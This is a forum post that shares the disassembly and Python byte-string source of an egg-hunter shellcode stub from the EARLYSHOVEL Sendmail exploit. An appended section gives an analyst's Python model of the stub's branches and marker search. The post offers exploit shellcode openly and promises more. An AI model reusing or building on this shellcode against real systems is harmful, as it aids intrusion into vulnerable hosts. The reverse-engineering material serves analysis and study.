EARLYSHOVEL disassembly (x86) 04-03-2022, 02:09 AM
#1
EARLYSHOVEL
What is it?
A RedHat 7.0 - 7.1 Sendmail 8.11.x exploit
The original Python and ASM should interest you
Code:
# https://gist.github.com/84a98b20a6c4186890f1520c5bd2caa0
# Disassembly D:
# (the listing below was decoded in 64-bit mode; on the 32-bit target
#  read RCX/RAX as ECX/EAX and QWORD PTR as DWORD PTR)
# 0000000000000000 EB1E JMP 0000000000000020
# 0000000000000002 59 POP RCX
# 0000000000000003 51 PUSH RCX
# 0000000000000004 FF31 PUSH QWORD PTR [RCX]
# 0000000000000006 59 POP RCX
# 0000000000000007 58 POP RAX
# 0000000000000008 31DB XOR EBX,EBX
# 000000000000000A B304 MOV BL,04
# 000000000000000C 01D8 ADD EAX,EBX
# 000000000000000E F6DB NEG BL
# 0000000000000010 20D8 AND AL,BL
# 0000000000000012 F6DB NEG BL
# 0000000000000014 01D8 ADD EAX,EBX
# 0000000000000016 3B08 CMP ECX,DWORD PTR [RAX]
# 0000000000000018 75FA JNE 0000000000000014
# 000000000000001A 01D8 ADD EAX,EBX
# 000000000000001C 50 PUSH RAX
# 000000000000001D 59 POP RCX
# 000000000000001E FFE1 JMP RCX
# 0000000000000020 E8DDFFFFFF CALL 0000000000000002
# 0000000000000025 51 PUSH RCX
# 0000000000000026 51 PUSH RCX
# 0000000000000027 51 PUSH RCX
# 0000000000000028 51 PUSH RCX
#!/usr/bin/python
# short jump forward to the CALL at 0x20
spin = "\xeb\x1e"
# pick up the address the CALL pushed, load the marker value, align the pointer
start = "\x59\x51\xff\x31\x59\x58\x31\xdb\xb3\x04\x01\xd8\xf6\xdb\x20\xd8" "\xf6\xdb"
# step 4 bytes at a time until the marker value is seen again
findit = "\x01\xd8\x3b\x08\x75\xfa"
# skip past the marker and jump to what follows it
found = "\x01\xd8\x50\x59\xff\xe1"
# CALL back to offset 0x02
end = "\xe8\xdd\xff\xff\xff"
# marker
data = "\x51\x51\x51\x51"
def build():
    tmp = spin + start + findit + found + end + data
    return tmp
More to follow..
ed25519/0x21AB6B6A6CB2C337
C87D87466FD205945CF10A3821AB6B6A6CB2C337
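For analysts reading the listing above, here is an added example (not part of the original post or the gist) that checks the three relative branches against the disassembly and models the stub's 4-byte-aligned marker search over a buffer. The function names and the sample buffers in the test are constructed for illustration, and the model assumes the buffer sits at a 4-byte-aligned address.

```python
import struct

# Stub bytes as listed in the post, without the trailing 4-byte marker.
STUB = bytes.fromhex("eb1e5951ff31595831dbb30401d8f6db20d8f6db"
                     "01d83b0875fa01d85059ffe1e8ddffffff")
# (offset, instruction length, displacement format) for the three relative
# branches in the listing: JMP rel8, JNE rel8, CALL rel32.
BRANCHES = [(0x00, 2, "<b"), (0x18, 2, "<b"), (0x20, 5, "<i")]


def branch_targets(code=STUB):
    """Resolve each relative branch to the offset it transfers to."""
    out = {}
    for off, length, fmt in BRANCHES:
        size = struct.calcsize(fmt)
        (disp,) = struct.unpack_from(fmt, code, off + length - size)
        out[off] = off + length + disp   # target = next instruction + disp
    return out


def model_scan(buf):
    """Locate the stub in buf and model its aligned forward search.

    Returns (stub_offset, marker, landing_offset). landing_offset is None
    when no 4-byte-aligned copy of the marker follows inside buf.
    Returns None when the stub bytes are not present at all.
    """
    off = buf.find(STUB)
    if off < 0:
        return None
    marker_at = off + len(STUB)          # address pushed by CALL, popped at 0x02
    marker = buf[marker_at:marker_at + 4]
    pos = (marker_at + 4) & ~3           # ADD EAX,EBX then AND AL,0xFC
    while pos + 8 <= len(buf):
        pos += 4                         # ADD EAX,EBX at 0x14
        if buf[pos:pos + 4] == marker:   # CMP ECX,[EAX] / JNE 0x14
            return off, marker, pos + 4  # final ADD, then JMP to that offset
    return off, marker, None
```

A second copy of the marker that is not 4-byte aligned is never matched, which is why the model returns `None` for it.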